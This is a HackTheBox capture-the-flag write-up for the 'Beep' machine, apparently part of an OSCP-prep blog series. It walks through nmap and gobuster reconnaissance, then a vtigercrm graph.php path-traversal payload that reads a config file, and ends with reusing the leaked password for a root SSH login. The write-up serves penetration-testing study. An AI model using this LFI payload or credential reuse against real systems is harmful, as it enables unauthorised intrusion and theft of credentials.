HacktheBox - Beep Writeup

02/11/2019

Zero to OSCP Hero Writeup #11 - Beep

Reconnaissance

1. Nmap Scan - TCP Scan

Let's start with a TCP scan of the target ip address to determine which ports are open and which services are running on those ports:

nmap -sC -sV -oA nmap/initial.tcp 10.10.10.7

  • -sC: Run the default nmap script scan to find potential vulnerabilities
  • -sV: Detect the service version
  • -oA: Output the result of the scan in all formats as nmap/initial.tcp

Okay so there are a few ports open! There are the standard ports that are common on these boxes, SSH on Port 22 and HTTP on Port 80 but it also seems that there is mail server present on this machine with common mail ports and protcols in use, SMTP, Pop3, IMAP etc with what also seems like a webmin admin login portal on port 10000 and last but not least, mysql is also running on the machine. 

2. Nmap Scan - All TCP Ports Scan

Okay, lets scan the entire TCP port range to confirm that there are no other ports open:

nmap -sC -sV -p- -oA nmap/full.tcp 10.10.10.7

  • -sC: Run the default nmap script scan to find potential vulnerabilities
  • -sV: Detect the service version
  • -p-: Run the nmap scan against all ports
  • -oA: Output the result of the scan in all formats as nmap/full.tcp

The full TCP scan confirmed that there are no additional ports open.

3. Nmap Scan - All UDP Ports Scan

We can do the same full port scan, but with the UDP ports:

nmap -sU -p- -oA nmap/full.udp 10.10.10.7

  • -sU: Run the scan against UDP ports
  • -p-: Run the nmap scan against all ports
  • -oA: Output the result of the scan in all formats as nmap/full.tcp

The full UDP scan shows several ports open, including TFTP which is in an open|filtered state. 

Enumeration - Port 80

1. Browse to 10.10.10.7

When we browse to 10.10.10.7 via http, it redirects us via port 443 to a https webpage that is showing a login portal for elastix.  

2. Gobuster

As default credentials dont seems to work on the login panel and nothing of not in the page source code, lets run a gobuster on Port 80:

gobuster dir -k -u https://10.10.10.7/  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

  • dir: Indicate that we want to scan for directories 
  • -k: Skip SSL certificate verification
  • -u: URL to scan
  • -w: Wordlist to use for the directory search 

After looking through some of the more inseresting directories like /config, the directory /vtigercrm catches my eye as it is another login panel.

3. Searchsploit 

Again, as default credentials dont work for the /vtigercrm login panel, lets see if searchsploit can provide us with any help forward: 

searchsploit elastix

After looking at several of these exploits, the 'graph.php' LFI exploit is one i want to look more into. 

searchsploit -m exploits/php/webapps/37637.pl 

So this LFI exploits the directory /vtigercrm! 

Lets copy the LFI exploit link and see what it provides: 

https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

Okay, so this looks a little messy, lets view the page source to make it easier to read! 

Bingo! So this page lists the default freePBX database configuration, along with usernames and passwords! 

As we can see, the default passwords have been changed to: jEhdIekWmdjE

Foothold - Root via LFI

After logging into freePBX with the changed password, there was no luck with gaining a foothold via the portal. 

1. Logging into Beep via SSH

As SSH was running on the machine, I thought to try the password found from the config file to login via SSH... and it worked! 

ssh root@10.10.10.7

 jEhdIekWmdjE 

We are root! 

whoami&&id&&hostname

cat root.txt 

and through the user fanis, we were able to grab the user.txt! 

cat user.txt 

What did I learn from Beep?

I enjoyed this box as it had multiple avenues for exploitation, via the LFI which i used or via port 10000 by utilising a blind payload in the user-agent field.

I think that this box is quite realistic as im sure that the same password is used for multiple accounts, of varying permissions, aswell as running out of date and vulnerable software! 

Conclusion

Thanks for reading! Next up is Box #12 - Granny!